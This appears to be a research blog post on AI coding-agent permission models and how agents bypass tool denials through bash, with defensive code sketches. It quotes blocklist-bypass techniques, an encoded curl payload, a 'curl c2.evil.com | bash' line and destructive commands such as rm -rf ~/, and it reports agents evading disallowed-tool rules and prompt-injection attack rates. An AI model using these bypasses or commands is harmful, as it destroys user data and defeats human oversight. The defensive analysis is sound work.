clearloop for CrabTalk

Posted on Mar 15 • Originally published at openwalrus.xyz

Tool permissions and the bash bypass problem

#ai #research #opensource #openwalrus

Most agent frameworks ship a set of structured tools — Read, Write, Edit, Glob, Grep — alongside a general-purpose Bash tool. The structured tools have clear semantics: Edit replaces a specific string in a file, Write creates a file, Read returns file contents. Each can be individually gated with permission rules.

But there's a problem. If the agent also has Bash, every structured tool is redundant from a security standpoint. Edit replaces a string in a file — but so does sed -i. Write creates a file — but so does echo "content" > file. Read returns file contents — but so does cat. If you deny Write but allow Bash, the agent writes files through cat <<'EOF' > file.txt.
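
The gap can be reproduced in a few lines. The following is a minimal sketch, assuming a hypothetical dispatcher (`call_tool`) that enforces a deny list by tool name only and a POSIX `sh` on the PATH; it does not reflect any particular framework's code.

```python
import subprocess
import tempfile
from pathlib import Path

DENIED_TOOLS = {"Write", "Edit"}  # hypothetical tool-level deny list


def call_tool(name: str, arg: str, cwd: Path) -> str:
    """Dispatch a tool call, enforcing the deny list by tool name only."""
    if name in DENIED_TOOLS:
        return "denied"
    if name == "Bash":
        # The gate never inspects what the command actually does.
        subprocess.run(["sh", "-c", arg], cwd=cwd, check=True)
        return "ok"
    return "unknown tool"


def demo() -> tuple[str, str, str]:
    """Try to create a file through Write, then through Bash."""
    with tempfile.TemporaryDirectory() as tmp:
        cwd = Path(tmp)
        direct = call_tool("Write", "notes.txt", cwd)
        via_shell = call_tool("Bash", "echo hello > notes.txt", cwd)
        return direct, via_shell, (cwd / "notes.txt").read_text()
```

Calling `demo()` shows the Write call refused and the same file created through the shell anyway.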

This raises a design question we haven't seen anyone address directly: what if you skip the structured tools entirely and give agents only bash? The structured tools exist for user experience — diffs are reviewable, edits are atomic, reads are paginated. But from a permission standpoint, they create a false sense of control. This post surveys how eight frameworks handle the tension, what the security research says about bash bypasses, and whether the "just bash" design has merit.

The bypass is not theoretical

The gap between "deny the edit tool" and "the agent edits via bash" is not a theoretical concern. It has been exploited, documented, and CVE-assigned.

Claude Code. GitHub issue #31292 documents the most direct case: a user set disallowedTools: [Write, Edit, NotebookEdit] with a system prompt rule "NEVER write code." The agent bypassed it by running sed -i 's/hello/goodbye/' file.txt. No error. No warning. The disallowedTools enforcement blocks the named tool functions but not equivalent Bash operations. The issue author's assessment: "this never worked."

A second issue (#6527, 17 comments) shows that when Bash is in the allow list, the ask list for specific bash patterns is completely ignored. A user tried to allow general bash while requiring approval for rm and git push. Result: rm executed without confirmation.

In June 2025, Flatt Security documented eight distinct techniques to bypass Claude Code's command blocklist (CVE-2025-66032):

- man --html: missed by the blocklist, executes arbitrary programs
- sort --compress-program: invokes any executable as a "compressor"
- history -s + history -a: injects commands into shell startup files
- Git argument abbreviation: --upload-pa bypasses exact-match for --upload-pack
- sed e-flag: replacement text executes as a shell command
- xargs flag mismatch: regex misinterpreted which flags consume arguments
- Ripgrep $IFS expansion: whitespace injection enables --pre=sh
- Bash @P expansion: multi-stage variable expansion chains bypass $( filtering

Claude Code replaced its blocklist with an allowlist after these findings.
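
The Git abbreviation entry in the list above is easy to model. This is a rough sketch, assuming a hypothetical flag blocklist; the function names are illustrative and this is not Claude Code's actual checker. It relies on the fact that Git's option parser accepts unambiguous prefixes of long options.

```python
BLOCKED_FLAGS = {"--upload-pack"}  # illustrative entry taken from the text


def exact_match_blocks(arg: str) -> bool:
    """Naive check: block only when the flag name matches exactly."""
    return arg.split("=", 1)[0] in BLOCKED_FLAGS


def prefix_aware_blocks(arg: str) -> bool:
    """Also block abbreviations that a prefix-accepting parser could
    expand to a blocked flag (deliberately over-conservative)."""
    name = arg.split("=", 1)[0]
    if not name.startswith("--") or len(name) <= 2:
        return False
    return any(flag.startswith(name) for flag in BLOCKED_FLAGS)
```

Even the prefix-aware version is still a blocklist: it only closes the one gap its author thought of, which is the argument for switching to an allowlist.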

Cursor. Backslash Security showed why a denylist cannot be made complete. echo JChjdXJsIGdvb2dsZS5jb20pCgoK | base64 -d | zsh bypasses any denylist entry for curl (the payload decodes to $(curl google.com)). bash -c "curl google.com" wraps the denied command in a subshell. Inserting empty quotes, as in ""e""cho, yields unlimited spellings of the same command. Their conclusion: "For every command in a Cursor denylist, there are infinite commands not present in the denylist which, when executed, have the same behavior." Cursor deprecated its denylist in release 1.3.
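
To make the argument concrete, here is a small sketch, assuming a deliberately naive denylist that compares the first word of a command against a set of denied names. The checker is hypothetical and is not Cursor's implementation; the command strings are the ones quoted above.

```python
import base64
import shlex


def naive_denylist_blocks(command: str, denied: set[str]) -> bool:
    """Block when the first whitespace-separated word is a denied name."""
    words = command.split()
    return bool(words) and words[0] in denied


PAYLOAD = "JChjdXJsIGdvb2dsZS5jb20pCgoK"  # base64 string quoted in the text

# Variants from the text: none of them starts with the denied word.
ENCODED = f"echo {PAYLOAD} | base64 -d | zsh"
WRAPPED = 'bash -c "curl google.com"'
QUOTED = '""e""cho hi'  # a shell drops the empty quotes and runs echo

if __name__ == "__main__":
    for cmd in ("curl google.com", ENCODED, WRAPPED):
        print(cmd, "->", naive_denylist_blocks(cmd, {"curl"}))
    print("decoded payload:", base64.b64decode(PAYLOAD).decode().strip())
    print("shell sees:", shlex.split(QUOTED)[0])
```

Smarter matching (substring search, quote stripping) closes individual holes, but each fix invites another encoding, which is the point of the quoted conclusion.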

Trail of Bits. Their research showed that even allowlisted "safe" commands can be weaponized: go test -exec 'bash -c "curl c2.evil.com | bash"', rg --pre=sh, fd -x=python3. They reference GTFOBINS, which catalogs hundreds of legitimate Unix binaries that accept arguments enabling arbitrary code execution.
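
The same weakness can be sketched for allowlists. The example below assumes a hypothetical allowlist keyed on the binary name and a small, non-exhaustive table of flags that launch other programs; both tables are illustrative, not taken from any framework.

```python
import shlex

ALLOWED_BINARIES = {"go", "rg", "fd"}  # hypothetical allowlist

# Hypothetical, non-exhaustive table of arguments that run other programs.
EXEC_FLAGS = {
    "go": {"-exec"},
    "rg": {"--pre"},
    "fd": {"-x", "--exec"},
}


def allowlisted(command: str) -> bool:
    """Approve a command purely on the name of its binary."""
    argv = shlex.split(command)
    return bool(argv) and argv[0] in ALLOWED_BINARIES


def launches_other_program(command: str) -> bool:
    """Flag arguments known to hand control to another executable."""
    argv = shlex.split(command)
    if not argv:
        return False
    risky = EXEC_FLAGS.get(argv[0], set())
    return any(arg.split("=", 1)[0] in risky for arg in argv[1:])
```

All three commands from the paragraph above pass `allowlisted` and are caught only by the flag table, which would have to track every exec-capable option of every allowed binary to stay correct.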

The real-world damage

The Claude Code issue tracker documents what happens when agents have unrestricted bash:

| Issue | What happened |
|---|---|
| #30816 | `rm -rf` on local drive folders: months of production code deleted |
| #28521 | `find / -delete` during security test: all personal files in /home deleted |
| #27063 | `drizzle-kit push --force`: 60+ production database tables destroyed |
| #29179 | `git clean -fd` after `git rm -rf .`: gitignored directories permanently deleted |
| #32637 | `cp -a` + `rm -rf` on iCloud stubs: 110+ sensitive documents destroyed |
| #27675 | `python3 manage.py migrate` + raw SQL: irreversible schema changes |

A December 2025 incident, first reported on Reddit, reached 197 points on Hacker News: a user asked Claude to clean up packages and it ran rm -rf tests/ patches/ plan/ ~/. The trailing ~/ expanded to the user's entire home directory. In January 2026, Claude Cowork executed rm -rf on 11GB of user data, then marked its task list item "Delete user data folder: Completed."
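
A pre-flight check for the tilde case might look like the sketch below. It assumes a hypothetical helper that receives the command's path arguments, the workspace root, and the home directory; it models only a leading `~` or `~/` and does no real filesystem access.

```python
import posixpath
from pathlib import PurePosixPath


def resolve(arg: str, cwd: str, home: str) -> PurePosixPath:
    """Expand a leading ~ the way a POSIX shell would, then normalize.
    (~user forms and quoting are not handled in this sketch.)"""
    if arg == "~" or arg.startswith("~/"):
        arg = home + arg[1:]
    return PurePosixPath(posixpath.normpath(posixpath.join(cwd, arg)))


def targets_outside_workspace(
    args: list[str], workspace: str, home: str
) -> list[str]:
    """Return the arguments that resolve outside the workspace root."""
    root = PurePosixPath(posixpath.normpath(workspace))
    escaped = []
    for arg in args:
        target = resolve(arg, workspace, home)
        if target != root and root not in target.parents:
            escaped.append(arg)
    return escaped
```

With the arguments from the incident, only `~/` is reported. A check like this is advisory at best; it shares the weaknesses of any command parser and is no substitute for a sandbox.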

How frameworks handle it today

Two philosophies

Every framework falls into one of two camps:

Gate the tool, trust the shell. Claude Code, LangGraph, Google ADK, and CrewAI distinguish between structured tools and shell access. Each structured tool can be individually permitted or denied. Bash is treated as a separate, higher-risk tool with its own approval flow. The problem: this creates the bypass gap. Denying Write while allowing Bash is security theater.

Gate the environment, give full access within it. Codex CLI, Cursor (post-1.3), and increasingly Claude Code use OS-level sandboxes as the primary boundary. The agent gets full access to bash and every structured tool — but the sandbox constrains where those tools can operate. Writes are limited to the workspace. Network is blocked. The .git directory is read-only. The bypass gap vanishes because both paths are constrained by the same kernel-level policy.
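
The idea that one policy covers both paths can be illustrated with a toy model. This is only a sketch: real sandboxes enforce the policy in the kernel, whereas `SandboxPolicy`, `edit_tool`, and `bash_redirect` here are hypothetical names that simulate the decision in user space.

```python
import posixpath
from dataclasses import dataclass
from pathlib import PurePosixPath


@dataclass(frozen=True)
class SandboxPolicy:
    """Toy stand-in for a kernel-enforced policy (hypothetical names)."""

    workspace: str
    allow_network: bool = False

    def allows_write(self, path: str) -> bool:
        root = PurePosixPath(posixpath.normpath(self.workspace))
        joined = posixpath.join(self.workspace, path)
        target = PurePosixPath(posixpath.normpath(joined))
        inside = target == root or root in target.parents
        # .git stays read-only even though it sits inside the workspace.
        in_git = (root / ".git") in (target, *target.parents)
        return inside and not in_git


def edit_tool(policy: SandboxPolicy, path: str) -> str:
    """Structured-tool path."""
    return "written" if policy.allows_write(path) else "blocked"


def bash_redirect(policy: SandboxPolicy, path: str) -> str:
    """Shell path, e.g. `echo x > path`; subject to the same policy."""
    return "written" if policy.allows_write(path) else "blocked"
```

Because both entry points consult the same policy object, there is no path for which one tool is blocked and the other is not.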

The sandbox approach

Codex CLI implements this most cleanly. It uses Seatbelt on macOS and Landlock + seccomp on Linux. Three modes: Suggest (the user approves every action), Auto (auto-approve within the workspace), Full-auto (auto-approve all). Even in full-auto, the sandbox prevents writes outside the workspace. The file-edit vs. bash distinction is irrelevant because both are constrained by the same OS-level policy.

Cursor adopted the same approach after deprecating its denylist. Their reported result: sandboxed agents stop 40% less often than unsandboxed ones. The sandbox improves developer experience by replacing per-command approval prompts with environment-level constraints.

Claude Code's sandbox constrains bash and its child processes. But a GitHub issue (#26616) reveals the gap: the Read, Write, Edit, Glob, and Grep tools execute in the same process as Claude Code itself, outside the sandbox. A prompt injection could use Read to access credentials or Edit to modify configuration — without triggering any sandbox restriction. The sandbox covers bash but not the structured tools.

The permission-model approach

Claude Code's permission system is the most granular. Five modes (default, acceptEdits, plan, dontAsk, bypassPermissions). Pattern-based specifiers: Bash(npm run *) allows npm commands, Edit(/src/**/*.ts) restricts edits to TypeScript files. Shell-aware matching understands && operators so Bash(safe-cmd *) won't approve safe-cmd && dangerous-cmd.
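
Why the matcher has to understand shell operators can be shown with a short sketch. It assumes a simple glob-style pattern list and a naive operator split that ignores quoting; this is an illustration of the idea, not Claude Code's actual matching logic.

```python
import fnmatch
import re

ALLOW_PATTERNS = ["npm run *"]  # mirrors the Bash(npm run *) specifier

# Naive operator split; a real matcher would need to respect quoting.
_OPERATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")


def whole_string_match(command: str) -> bool:
    """Match the pattern against the entire command line."""
    return any(fnmatch.fnmatchcase(command, p) for p in ALLOW_PATTERNS)


def per_segment_match(command: str) -> bool:
    """Require every operator-separated segment to match a pattern."""
    segments = [s for s in _OPERATORS.split(command) if s]
    return bool(segments) and all(whole_string_match(s) for s in segments)
```

A whole-string glob approves `npm run test && rm -rf /` because `*` swallows everything after the prefix; the per-segment version rejects it while still approving chains of allowed commands.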

OpenClaw separates file tools and exec tools into different groups (group:fs vs group:runtime). Denying group:runtime while allowing group:fs blocks shell access while keeping file operations. Deny always wins in the policy hierarchy.
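
A deny-wins resolution over tool groups could be sketched as follows. The group names come from the paragraph above; the tool names inside each group and the `is_allowed` function are assumptions made for illustration, not OpenClaw's configuration schema.

```python
TOOL_GROUPS = {
    "group:fs": {"read", "write", "edit"},  # hypothetical membership
    "group:runtime": {"exec"},              # hypothetical membership
}


def expand(entries: list[str]) -> set[str]:
    """Replace group names with their member tools."""
    tools: set[str] = set()
    for entry in entries:
        tools |= TOOL_GROUPS.get(entry, {entry})
    return tools


def is_allowed(tool: str, allow: list[str], deny: list[str]) -> bool:
    """Deny always wins; otherwise the tool must be explicitly allowed."""
    if tool in expand(deny):
        return False
    return tool in expand(allow)
```

Denying `group:runtime` removes the shell entirely, which is the one configuration where gating file tools individually is meaningful.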

Google ADK provides before_tool_callback hooks that can inspect arguments and block execution. LangGraph provides interrupt_on for per-tool human approval. Both are developer-dependent — no automatic enforcement.

Aider and CrewAI use trust-based models. Aider's --yes flag bypasses all prompts. CrewAI's tool assignment is all-or-nothing with no runtime permission checks.

What if there's only bash?

Here's the contrarian design position: if bash makes structured tools redundant for security, maybe the solution is to drop the structured tools and treat bash as the single tool that matters.

Arguments for bash-only

One permission boundary instead of many. With only bash, there's exactly one tool to gate. No bypass gap. No confusion about which tool has which permission. The agent either has shell access or it doesn't — and if it does, the sandbox is the security boundary.

Simpler mental model. Users don't need to understand the difference between Edit permissions and Bash(sed *) permissions. There's one tool. Either it's allowed, or it's not.

What agents actually do. Many agent workflows are bash-heavy anyway. Running tests, installing packages, git operations, building projects — all happen through the shell. The structured tools are a convenience layer for file editing, but the agent could accomplish the same work through sed, patch, cat, or echo.

Arguments against bash-only

Reviewability. The strongest argument for structured tools isn't security — it's user experience. An Edit call shows a clean diff: old string, new string, file path. A sed -i 's/old/new/g' file.txt command is harder to review. A cat <<'EOF' > file.txt command replaces the entire file with no diff. For long or complex edits, structured tools make the agent's intent transparent.

Atomicity. Edit either succeeds or fails as a unit. A bash pipeline — sed then mv then chmod — can fail partway through, leaving files in inconsistent states. Structured tools avoid this class of errors by design.
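
One common way to get this all-or-nothing behavior is to write to a temporary file and rename it over the original. The sketch below assumes an Edit-like operation that requires exactly one occurrence of the old string; that rule and the function name are illustrative, and no framework's Edit tool is claimed to work this way.

```python
import os
import tempfile
from pathlib import Path


def atomic_replace(path: Path, old: str, new: str) -> None:
    """Replace one occurrence of `old`, or leave the file untouched."""
    text = path.read_text()
    if text.count(old) != 1:
        raise ValueError("expected exactly one occurrence of the old string")
    # Write next to the target so the final rename stays on one filesystem.
    fd, tmp_name = tempfile.mkstemp(dir=path.parent)
    try:
        with os.fdopen(fd, "w") as tmp:
            tmp.write(text.replace(old, new))
        os.replace(tmp_name, path)  # atomic rename on POSIX filesystems
    except BaseException:
        os.unlink(tmp_name)
        raise
```

Readers of the file see either the old content or the new content, never a half-written mix. Note that this sketch does not preserve the original file's permission bits.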

The system prompt compliance problem. Claude Code's system prompt instructs the agent: "Do NOT use the Bash to run cat, head, tail, sed, awk, or echo commands. Instead, use the appropriate dedicated tool." GitHub issue #32193 documents the broader problem: "Every rule in CLAUDE.md is advisory to the model. There is no enforcement mechanism." The agent sometimes uses bash for file operations despite being told not to — but structured tools at least exist as the preferred path. Remove them, and the agent has no choice but bash for everything.

Sandbox limits. Even with OS-level sandboxing, bash can reach external services. drizzle-kit push --force destroyed 60+ production tables (#27063) — a command that operates on a remote database through a network connection. gh release delete-asset deleted assets from GitHub (#29120). Sandboxing constrains where the agent operates on the local filesystem, not what it does via network services.

The middle ground: bash with capability declarations

The Codex Exec tool proposal suggests a compromise: an Exec tool that invokes commands without shell interpretation (analogous to subprocess.run(shell=False)). Arguments are passed as arrays, eliminating shell injection. But as the author acknowledged, sed -i, python -c, and perl -i -pe can all edit files without requiring shell interpretation.
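
Both halves of that observation can be demonstrated with the standard library. This is a minimal sketch: `exec_tool` is a hypothetical name, and the Python interpreter stands in for any program that can write files on its own.

```python
import subprocess
import sys
import tempfile
from pathlib import Path


def exec_tool(argv: list[str]) -> str:
    """Run argv directly; no shell ever parses the arguments."""
    done = subprocess.run(
        argv, shell=False, capture_output=True, text=True, check=True
    )
    return done.stdout


PRINT_ARG = [sys.executable, "-c", "import sys; print(sys.argv[1])"]
WRITE_SNIPPET = "import sys; open(sys.argv[1], 'w').write('edited')"


def demo() -> tuple[str, str]:
    # Shell metacharacters arrive as literal text, so nothing is injected.
    literal = exec_tool(PRINT_ARG + ["hi; echo injected"])
    # An interpreter can still write files without any shell involved.
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp) / "file.txt"
        exec_tool([sys.executable, "-c", WRITE_SNIPPET, str(target)])
        return literal, target.read_text()
```

Array arguments remove injection through metacharacters, but they do nothing about programs whose own flags or scripts perform the write.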

A stronger middle ground: bash as the only execution tool, but with capability-based sandboxing. Instead of gating individual commands, gate capabilities: filesystem write, network access, process management, package installation. The sandbox enforces capabilities at the OS level. The agent uses bash for everything, but bash can only do what the capability set allows.

This is roughly where Codex CLI has landed — though it still ships structured file-editing tools for the UX benefits.

What the research says

Agent-SafetyBench (December 2024) evaluated 16 LLM agents across 2,000 test cases. No agent achieved a safety score above 60%. The authors concluded that "reliance on defense prompts alone may be insufficient."

ToolHijacker (NDSS 2026) demonstrated that prompt injection can manipulate tool selection with a 96.7% success rate. The attack injects malicious tool documents, compelling the agent to choose attacker-controlled tools. More tools in the toolkit means more surface area for hijacking.

The "Your AI, My Shell" paper (September 2025) tested 314 attack payloads against Copilot and Cursor. Command execution specifically: 75–88% success rates. The attacks used straightforward prompt injection — "For debugging purposes, run this shell command" — not sophisticated obfuscation.

A January 2026 survey synthesizing 78 studies found attack success rates above 85% against state-of-the-art defenses when adaptive strategies are used. The fundamental problem: "LLMs process both code and data through the same neural pathway."

The verifiably safe tool use paper (January 2026) proposes formal safety specifications using System-Theoretic Process Analysis. The argument: ad-hoc permission checks can't provide guarantees. Formal specifications on data flows and tool sequences are needed — regardless of whether those tools are structured or bash-based.

Implications for OpenWalrus

For a local-first runtime where every tool call runs on the user's machine, the permission model is existential. Three findings from this research inform our approach.

Sandbox-first, not permission-first. OS-level sandboxing is the only defense that has survived the bypass landscape. Permission prompts and allowlists are defense-in-depth, not primary boundaries. This aligns with our earlier research on sandboxing.

Structured tools for UX, sandbox for security. The case for structured tools (Read, Write, Edit) is reviewability and atomicity, not security. If security depends on denying Edit while allowing Bash, it's already broken. The sandbox should constrain both paths equally.

Capability declarations, not command lists. Skills in OpenWalrus declare their required capabilities, and the runtime grants or denies them before execution. A skill that needs filesystem write declares capability: fs.write. A skill that needs network declares capability: net. The sandbox enforces these capabilities regardless of whether the skill uses a structured tool or raw bash.
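
As a rough illustration of the admission step, consider the sketch below. The `Skill` type and both functions are hypothetical and do not represent the OpenWalrus API; only the capability names `fs.write` and `net` come from the text, and actual enforcement would happen in the sandbox rather than in this check.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Skill:
    """A skill and the capabilities it declares up front."""

    name: str
    capabilities: frozenset[str]


def missing_capabilities(skill: Skill, granted: set[str]) -> set[str]:
    """Capabilities the skill declares but the runtime has not granted."""
    return set(skill.capabilities) - granted


def admit(skill: Skill, granted: set[str]) -> bool:
    """Admit the skill only if every declared capability is granted."""
    return not missing_capabilities(skill, granted)
```

The decision depends only on what the skill declares, not on whether it later reaches the filesystem through a structured tool or through bash.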

The deeper question — whether to ship structured tools at all or go bash-only — depends on how much we value reviewability. The research suggests that from a security standpoint, structured tools add surface area without adding safety. But from a developer experience standpoint, seeing a clean diff vs. parsing a sed command is a meaningful difference. The answer may be: use bash as the single execution primitive, but present structured tool results as a rendering layer — the agent runs sed, but the UI shows a diff.
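
The rendering-layer idea can be sketched with the standard library, assuming the runtime snapshots a file before and after the shell command runs. The `render_diff` helper and the snapshot step are hypothetical; nothing here is an existing OpenWalrus feature.

```python
import difflib


def render_diff(path: str, before: str, after: str) -> str:
    """Turn before/after snapshots of a file into a unified diff."""
    lines = difflib.unified_diff(
        before.splitlines(keepends=True),
        after.splitlines(keepends=True),
        fromfile=f"a/{path}",
        tofile=f"b/{path}",
    )
    return "".join(lines)


if __name__ == "__main__":
    # Snapshots as they might look around `sed -i 's/hello/goodbye/' file.txt`.
    print(render_diff("file.txt", "hello\nworld\n", "goodbye\nworld\n"))
```

The user reviews the resulting diff regardless of which command produced it. The open cost is knowing which files to snapshot before an arbitrary command runs.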

Open questions

Is the structured-tool bypass a solvable problem? Claude Code's sandbox covers bash but not Edit/Write. Could a unified sandbox cover both? The challenge: structured tools run in-process, so sandboxing them requires sandboxing the agent process itself — which Codex CLI does but others don't.

Should bash be the default or the escape hatch? Codex CLI ships structured tools as defaults and bash as an option. Aider has no structured tools at all — everything goes through the LLM's edit format plus shell. Which produces better agent behavior?

Can capability-based sandboxing replace command-level gating? Instead of Bash(npm run *), declare capability: process.spawn(npm). Instead of Bash(curl *), declare capability: net.http. Is this more maintainable than regex-based command matching?

How should multi-agent systems inherit permissions? When a parent agent delegates to a sub-agent, does the sub-agent get the parent's full bash access? A subset? No bash at all? Current frameworks don't coordinate permissions across agents any more than they coordinate context compaction.

What does "observable permissions" look like? For a system where task state is a runtime primitive, permission grants and denials should appear in the task tree. When a tool is blocked, the parent should know — not just the agent that attempted it.
